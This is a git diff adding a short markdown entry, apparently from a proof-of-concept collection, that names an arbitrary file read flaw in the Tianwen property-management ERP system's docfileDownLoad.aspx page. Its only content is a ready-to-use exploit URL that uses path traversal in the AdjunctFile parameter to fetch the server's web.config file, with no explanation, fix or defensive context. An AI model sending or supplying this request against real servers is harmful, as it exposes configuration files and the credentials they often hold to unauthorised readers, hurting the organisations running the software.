diff --git a/天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞.md b/天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞.md new file mode 100644 index 0000000..f024069 --- /dev/null +++ b/天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞.md @@ -0,0 +1,7 @@ +## 天问物业ERP系统docfileDownLoad.aspx存在任意文件读取漏洞 + + +## poc +``` +http://ip/HM/M_Main/WorkGeneral/docfileDownLoad.aspx?AdjunctFile=../web.config +```